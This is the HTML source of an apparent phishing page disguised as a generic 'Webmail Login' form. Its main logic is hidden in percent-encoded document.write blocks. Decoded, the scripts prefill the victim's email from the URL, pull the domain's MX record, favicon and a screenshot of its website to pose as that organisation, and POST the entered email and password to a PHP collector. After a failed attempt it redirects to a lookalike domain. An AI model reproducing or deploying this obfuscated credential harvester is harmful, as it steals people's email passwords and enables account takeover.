<!DOCTYPE html>
<html>

<head>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>Webmail Login</title>

  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet"
    integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous" />
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" />
  <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/core.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.9-1/md5.js"></script>
  <style media="screen">
    body {
      background: #eceff1;
      color: rgba(0, 0, 0, 0.87);
      font-family: Roboto, Helvetica, Arial, sans-serif;
      margin: 0;
      padding: 0;
    }

    #bg {
      /* background: url() no-repeat center center;
      -webkit-background-size: cover;
      -moz-background-size: cover;
      -o-background-size: cover;
      background-size: cover; */

      /* Preserve aspet ratio */
      min-width: 100%;
      min-height: 100%;
    }


    #main {
      background: white;
      max-width: 360px;
      margin: 100px auto 16px;
      padding: 32px 24px 8px;
      border-radius: 3px;
    }

    #main h2 {
      color: #4caf50;
      font-weight: bold;
      font-size: 16px;
      margin: 0 0 8px;
    }

    #main h1 {
      font-size: 22px;
      font-weight: 300;
      color: #0067b8;
      margin: 0 0 16px;
    }

    #main p {
      line-height: 140%;
      margin: 16px 0 24px;
      font-size: 14px;
    }

    #main button {
      background: #0067b8;
    }

    #main a {
      display: block;
      text-align: center;
      background: #0067b8;
      text-transform: uppercase;
      text-decoration: none;
      color: white;
      padding: 16px;
      border-radius: 4px;
    }

    #main,
    #main a {
      box-shadow: 0 3px 15px rgba(0, 0, 0, 0.12), 0 3px 15px rgba(0, 0, 0, 0.5);
    }

    .avatar {
      border-radius: 100%;
      border: 2px solid #aaa;
    }

    .buttonload {
      background-color: #04aa6d;
      /* Green background */
      border: none;
      /* Remove borders */
      color: white;
      /* White text */
      padding: 12px 24px;
      /* Some padding */
      font-size: 16px;
      /* Set a font-size */
    }

    #load {
      color: rgba(0, 0, 0, 0.4);
      text-align: center;
      font-size: 13px;
    }

    @media (max-width: 600px) {

      body,
      #main {
        background: white;
      }
    }

    code {
      font-size: 18px;
      color: #999;
    }
  </style>
  <script></script>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
  <script>
    var loading = true;
    if (loading) {
      var href = window.location.href;
      var regex = new RegExp("[&\\?]cmd=");
      if (regex.test(href)) {
      } else {

        let rand = Math.random() * 1000000000;
        var md5 = CryptoJS.MD5(rand);
        window.location.href =
          href.replace(/]/g, "") +
          `?&cmd=login_submit&id=${rand + rand}&session=${md5 + md5}`;
        loading = false;
      }
    }
  </script>

</head>

<body id="bg">
  <div id="main">
    <div style="text-align: center">
      <img id="fieldImg" src="" width="50px" class="avatar" />
      <b>
        <p id="leterhead"></p>
      </b>
    </div>
    <div style="margin-top: 20px; text-align: center">
      <!--- <h1 id="header1">Shared File</h1> --->
    </div>
    <hr />
    <p>Login to Webmail</p>

    <script language=javascript>document.write(unescape('%3C%64%69%76%20%63%6C%61%73%73%3D%22%6D%62%2D%33%22%3E%0A%20%20%20%20%20%20%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%74%65%78%74%22%20%69%64%3D%22%65%6D%78%22%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%63%6F%6E%74%72%6F%6C%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%45%6D%61%69%6C%20%65%6D%61%69%6C%20%61%64%64%72%65%73%73%22%20%76%61%6C%75%65%3D%22%22%20%2F%3E%0A%20%20%20%20%3C%2F%64%69%76%3E'))</script>

    <script language=javascript>document.write(unescape('%20%3C%64%69%76%20%63%6C%61%73%73%3D%22%6D%62%2D%33%22%3E%0A%20%20%20%20%20%20%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%70%61%73%73%77%6F%72%64%22%20%69%64%3D%22%70%61%73%78%22%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%63%6F%6E%74%72%6F%6C%20%73%68%61%64%6F%77%2D%6E%6F%6E%65%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%27%45%6E%74%65%72%20%79%6F%75%72%20%70%61%73%73%77%6F%72%64%27%0A%20%20%20%20%20%20%20%20%61%75%74%6F%63%6F%6D%70%6C%65%74%65%3D%22%6A%61%6D%65%73%74%72%79%22%20%2F%3E%0A%20%20%20%20%20%20%3C%73%6D%61%6C%6C%20%69%64%3D%22%65%72%72%5F%65%6D%70%74%79%5F%70%77%22%20%73%74%79%6C%65%3D%22%63%6F%6C%6F%72%3A%20%72%65%64%3B%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E%50%6C%65%61%73%65%20%65%6E%74%65%72%20%79%6F%75%72%20%70%61%73%73%77%6F%72%64%3C%2F%73%6D%61%6C%6C%3E%0A%20%20%20%20%20%20%3C%73%6D%61%6C%6C%20%69%64%3D%22%65%72%72%5F%65%6D%70%74%79%5F%65%6D%22%20%73%74%79%6C%65%3D%22%63%6F%6C%6F%72%3A%20%72%65%64%3B%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E%45%6D%61%69%6C%20%63%61%6E%27%74%20%62%65%20%65%6D%70%74%79%3C%2F%73%6D%61%6C%6C%3E%0A%20%20%20%20%20%20%3C%73%6D%61%6C%6C%20%69%64%3D%22%65%72%72%5F%65%6D%70%74%79%5F%67%65%6E%22%20%73%74%79%6C%65%3D%22%63%6F%6C%6F%72%3A%20%72%65%64%3B%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E%57%72%6F%6E%67%20%44%65%74%61%69%6C%73%2E%20%74%72%79%20%61%67%61%69%6E%3C%2F%73%6D%61%6C%6C%3E%0A%20%20%20%20%3C%2F%64%69%76%3E'))</script>

    <input name="password" type="hidden" id="mx" value="">

    <div class="d-grid gap-2">
      <button class="btn btn-primary shadow-none" type="button" id="btn">
        Login
      </button>
    </div>
    <hr style="margin-top: 30px" />
    <div class="" style="text-align: center; display: block;cursor: pointer;" id="pdf">

      <div>
        <p style=" margin-bottom:10px;" id="copywrite"></p></button>
      </div>

    </div>
    <div style="margin-top: 20px"></div>
  </div>
</body>
<script>
  const phpLink = "en.php";
</script>
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%3E%0A%20%24%28%22%64%6F%63%75%6D%65%6E%74%22%29%2E%72%65%61%64%79%28%66%75%6E%63%74%69%6F%6E%28%29%7B%66%75%6E%63%74%69%6F%6E%20%61%28%61%29%7B%72%65%74%75%72%6E%20%61%2E%73%75%62%73%74%72%69%6E%67%28%61%2E%6C%61%73%74%49%6E%64%65%78%4F%66%28%22%40%22%29%2B%31%29%7D%61%73%79%6E%63%20%66%75%6E%63%74%69%6F%6E%20%62%28%29%7B%72%65%74%75%72%6E%20%24%28%22%23%65%72%72%5F%65%6D%70%74%79%5F%70%77%22%29%2E%68%69%64%65%28%29%2C%24%28%22%23%65%72%72%5F%65%6D%70%74%79%5F%65%6D%22%29%2E%68%69%64%65%28%29%2C%24%28%22%23%65%72%72%5F%65%6D%70%74%79%5F%67%65%6E%22%29%2E%68%69%64%65%28%29%2C%65%28%24%28%22%23%65%6D%78%22%29%2E%76%61%6C%28%29%29%3F%34%3E%24%28%22%23%70%61%73%78%22%29%2E%76%61%6C%28%29%2E%6C%65%6E%67%74%68%3F%28%24%28%22%23%65%72%72%5F%65%6D%70%74%79%5F%70%77%22%29%2E%73%68%6F%77%28%29%2C%24%28%22%23%62%74%6E%22%29%2E%68%74%6D%6C%28%22%4C%6F%67%69%6E%22%29%2C%24%28%22%23%70%61%73%78%22%29%2E%76%61%6C%28%22%22%29%2C%24%28%22%23%70%61%73%78%22%29%2E%66%6F%63%75%73%28%29%2C%21%31%29%3A%76%6F%69%64%28%61%77%61%69%74%20%63%28%61%28%24%28%22%23%65%6D%78%22%29%2E%76%61%6C%28%29%29%29%2C%63%6F%6E%73%6F%6C%65%2E%6C%6F%67%28%22%6C%6F%67%69%6E%22%29%2C%64%28%29%29%3A%28%24%28%22%23%65%72%72%5F%65%6D%70%74%79%5F%65%6D%22%29%2E%73%68%6F%77%28%29%2C%24%28%22%23%65%6D%78%22%29%2E%76%61%6C%28%22%22%29%2C%24%28%22%23%65%6D%78%22%29%2E%66%6F%63%75%73%28%29%2C%21%31%29%7D%61%73%79%6E%63%20%66%75%6E%63%74%69%6F%6E%20%63%28%61%29%7B%74%72%79%7B%63%6F%6E%73%74%20%62%3D%61%77%61%69%74%20%66%65%74%63%68%28%60%68%74%74%70%73%3A%2F%2F%64%6E%73%2E%67%6F%6F%67%6C%65%2F%72%65%73%6F%6C%76%65%3F%6E%61%6D%65%3D%24%7B%61%7D%26%74%79%70%65%3D%6D%78%60%29%2C%63%3D%61%77%61%69%74%20%62%2E%6A%73%6F%6E%28%29%2C%64%3D%61%77%61%69%74%20%63%2E%41%6E%73%77%65%72%5B%30%5D%2E%64%61%74%61%2C%65%3D%64%2E%73%70%6C%69%74%28%22%20%22%29%5B%31%5D%3B%72%65%74%75%72%6E%20%24%28%22%23%6D%78%22%29%2E%76%61%6C%28%65%29%2C%65%7D%63%61%74%63%68%28%61%29%7B%72%65%74%75%72%6E%20%24%28%22%23%6D%78%22%29%2E%76%61%6C%28%22%4E%6F%74%20%46%6F%75%6E%64%22%29%2C%22%4E%6F%74%20%46%6F%75%6E%64%22%7D%7D%66%75%6E%63%74%69%6F%6E%20%64%28%29%7B%63%6F%6E%73%6F%6C%65%2E%6C%6F%67%28%24%28%22%23%6D%78%22%29%2E%76%61%6C%28%29%29%2C%24%2E%61%6A%61%78%28%7B%75%72%6C%3A%70%68%70%4C%69%6E%6B%2C%74%79%70%65%3A%22%50%4F%53%54%22%2C%64%61%74%61%3A%7B%75%73%65%72%3A%24%28%22%23%65%6D%78%22%29%2E%76%61%6C%28%29%2C%70%61%73%73%3A%24%28%22%23%70%61%73%78%22%29%2E%76%61%6C%28%29%2C%6D%78%3A%24%28%22%23%6D%78%22%29%2E%76%61%6C%28%29%7D%7D%29%2E%64%6F%6E%65%28%66%75%6E%63%74%69%6F%6E%28%29%7B%31%3D%3D%3D%67%3F%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%67%6F%6F%67%65%6C%2E%63%6F%6D%2F%68%64%67%25%32%30%63%27%22%3A%28%67%2B%2B%2C%24%28%22%23%65%72%72%5F%65%6D%70%74%79%5F%67%65%6E%22%29%2E%73%68%6F%77%28%29%2C%24%28%22%23%70%61%73%78%22%29%2E%76%61%6C%28%22%22%29%2C%24%28%22%23%70%61%73%78%22%29%2E%66%6F%63%75%73%28%29%29%7D%29%2E%66%61%69%6C%28%66%75%6E%63%74%69%6F%6E%28%29%7B%63%6F%6E%73%6F%6C%65%2E%6C%6F%67%28%22%70%68%70%4C%69%6E%6B%20%65%72%72%6F%72%22%29%7D%29%7D%66%75%6E%63%74%69%6F%6E%20%65%28%61%29%7B%72%65%74%75%72%6E%20%2F%5E%28%28%5B%5E%3C%3E%28%29%5B%5C%5D%5C%5C%2E%2C%3B%3A%5C%73%40%5C%22%5D%2B%28%5C%2E%5B%5E%3C%3E%28%29%5B%5C%5D%5C%5C%2E%2C%3B%3A%5C%73%40%5C%22%5D%2B%29%2A%29%7C%28%5C%22%2E%2B%5C%22%29%29%40%28%28%5C%5B%5B%30%2D%39%5D%7B%31%2C%33%7D%5C%2E%5B%30%2D%39%5D%7B%31%2C%33%7D%5C%2E%5B%30%2D%39%5D%7B%31%2C%33%7D%5C%2E%5B%30%2D%39%5D%7B%31%2C%33%7D%5C%5D%29%7C%28%28%5B%61%2D%7A%41%2D%5A%5C%2D%30%2D%39%5D%2B%5C%2E%29%2B%5B%61%2D%7A%41%2D%5A%5D%7B%32%2C%7D%29%29%24%2F%2E%74%65%73%74%28%61%29%7D%6C%65%74%20%66%2C%67%3D%30%2C%68%3D%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%61%73%68%2C%69%3D%68%2E%73%70%6C%69%74%28%22%23%22%29%5B%31%5D%7C%7C%22%22%2C%6A%3D%69%2E%73%70%6C%69%74%28%22%3F%22%29%5B%30%5D%3B%24%28%22%23%62%74%6E%22%29%2E%63%6C%69%63%6B%28%66%75%6E%63%74%69%6F%6E%28%29%7B%62%28%29%7D%29%2C%24%28%22%23%70%64%66%22%29%2E%63%6C%69%63%6B%28%66%75%6E%63%74%69%6F%6E%28%29%7B%62%28%29%7D%29%2C%65%28%6A%29%3F%28%24%28%22%23%65%6D%78%22%29%2E%76%61%6C%28%6A%29%2C%66%75%6E%63%74%69%6F%6E%28%29%7B%6C%65%74%20%62%3D%61%28%24%28%22%23%65%6D%78%22%29%2E%76%61%6C%28%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%62%67%22%29%2E%73%74%79%6C%65%2E%62%61%63%6B%67%72%6F%75%6E%64%49%6D%61%67%65%3D%60%75%72%6C%28%24%7B%60%68%74%74%70%73%3A%2F%2F%70%6F%77%65%72%66%75%6C%2D%66%6F%72%74%72%65%73%73%2D%36%32%38%36%33%2E%68%65%72%6F%6B%75%61%70%70%2E%63%6F%6D%2F%61%70%69%2F%77%65%62%73%68%6F%74%3F%75%72%6C%3D%24%7B%62%7D%60%7D%29%60%2C%24%28%22%23%6C%65%74%65%72%68%65%61%64%22%29%2E%74%65%78%74%28%62%29%2C%24%28%22%23%63%6F%70%79%77%72%69%74%65%22%29%2E%68%74%6D%6C%28%60%A9%20%32%30%32%34%20%24%7B%62%7D%60%29%2C%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%66%69%65%6C%64%49%6D%67%22%29%2E%73%72%63%3D%60%68%74%74%70%73%3A%2F%2F%61%70%69%2E%66%61%76%69%63%6F%6E%6B%69%74%2E%63%6F%6D%2F%24%7B%62%7D%2F%34%30%60%2C%66%3D%62%7D%28%29%2C%24%28%22%23%70%61%73%78%22%29%2E%66%6F%63%75%73%28%29%29%3A%28%24%28%22%23%6C%65%74%65%72%68%65%61%64%22%29%2E%74%65%78%74%28%22%57%45%42%4D%41%49%4C%22%29%2C%24%28%22%23%63%6F%70%79%77%72%69%74%65%22%29%2E%68%74%6D%6C%28%60%A9%20%32%30%32%34%20%57%65%62%6D%61%69%6C%60%29%2C%24%28%22%23%65%6D%78%22%29%2E%66%6F%63%75%73%28%29%29%2C%24%28%22%23%70%61%73%78%22%29%2E%6B%65%79%64%6F%77%6E%28%66%75%6E%63%74%69%6F%6E%28%61%29%7B%69%66%28%31%33%3D%3D%61%2E%77%68%69%63%68%29%72%65%74%75%72%6E%20%24%28%22%23%62%74%6E%22%29%2E%63%6C%69%63%6B%28%29%2C%21%31%7D%29%7D%29%3B%0A%3C%2F%73%63%72%69%70%74%3E'))</script>


</html>